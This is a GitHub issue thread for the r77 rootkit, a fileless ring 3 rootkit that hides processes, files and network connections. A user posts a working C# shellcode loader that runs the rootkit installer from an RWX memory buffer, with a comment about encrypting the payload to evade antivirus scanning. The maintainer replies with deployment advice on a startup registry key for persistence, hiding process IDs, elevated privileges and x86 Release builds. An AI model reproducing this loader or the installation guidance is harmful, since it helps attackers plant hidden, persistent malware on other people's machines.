bytecode77 / r77-rootkit

Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections, etc.
https://bytecode77.com/r77-rootkit
BSD 2-Clause "Simplified" License
1.66k stars 398 forks source link

Adding a .exe to startup #68

Closed Klaped closed 10 months ago

Klaped commented 10 months ago

If I wanted to add a .exe to start up I would need to drop this to the disk right?

Also, is there any persistence to that file to keep it on the machine or just the hidden extension etc.

thanks

Klaped commented 10 months ago

^ And do i write to this key using my original dropping process or is that done thru a pipe

Klaped commented 10 months ago
using System;
using System.Reflection;
using System.Runtime.InteropServices;

// Example on how to use Install.shellcode

// Install.shellcode wraps up Install.exe in a way that it can be loaded and executed as shellcode.

namespace drp
{
    public static class Program
    {
        public static void Main()
        {
            // --- Elevated privileges required ---

            // 1. Load Install.shellcode from resources or from a byte[]
            // Ideally, encrypt the file and decrypt it here to avoid scantime detection.
            byte[] shellCode = Properties.Resources.Install;

            // 2. Create an RWX buffer with the shellcode.
            IntPtr buffer = VirtualAlloc(IntPtr.Zero, (IntPtr)shellCode.Length, 0x1000, 0x40);
            Marshal.Copy(shellCode, 0, buffer, shellCode.Length);

            // 3. Start the shellcode in a thread and wait until it terminated.
            IntPtr thread = CreateThread(IntPtr.Zero, 0, buffer, IntPtr.Zero, 0, out _);
            WaitForSingleObject(thread, 0xffffffff);

            // This is the fileless equivalent to executing Install.exe.
        }

        [DllImport("kernel32.dll")]
        private static extern IntPtr VirtualAlloc(IntPtr address, IntPtr size, int allocationType, int protect);
        [DllImport("kernel32.dll")]
        private static extern IntPtr CreateThread(IntPtr threadAttributes, uint stackSize, IntPtr startAddress, IntPtr parameter, uint creationFlags, out uint threadId);
        [DllImport("kernel32.dll")]
        private static extern uint WaitForSingleObject(IntPtr handle, uint milliseconds);
    }
}

also, what am i doing wrong here? exits with code 0 but doesnt initialize r77

bytecode77 commented 10 months ago

If I wanted to add a .exe to start up I would need to drop this to the disk right?

Also, is there any persistence to that file to keep it on the machine or just the hidden extension etc.

When using the startup key, yes, your file resides on the disk and could be deleted by AV.

And do i write to this key using my original dropping process or is that done thru a pipe

You can write to $77config\startup using normal registry functions, because this key is writeable from any user, even if it's located in HKLM. This persistence mechanism doesn't make your exe fileless. If you want it to be fileless, you need some sort of custom implementation. But you can still add the PID to the hidden process ID list, though.

also, what am i doing wrong here? exits with code 0 but doesnt initialize r77

Are you sure you're running this using elevated privileges? When run from VS, make sure VS is started as administrator. By the way, this example code will always return 0 (void Main()).

Klaped commented 10 months ago

Thanks for the help! Still cannot get the shellcode to execute though, its allocating the memory correctly tho. What should my Build Action be set to for the .shellcode resource?

bytecode77 commented 10 months ago

The Install.exe must be compiled with Release, not Debug - or try the Install.shellcode file that I've provided. Additionally, your C# code must not be x64 or AnyCPU, it must be x86.

For testing purposes, you can just load Install.shellcode from disk to verify that there isn't any problem with some VS build action for the resource file. However, the build action can be None, if you add it to your resources.resx file.

Klaped commented 10 months ago

Alright, Thanks!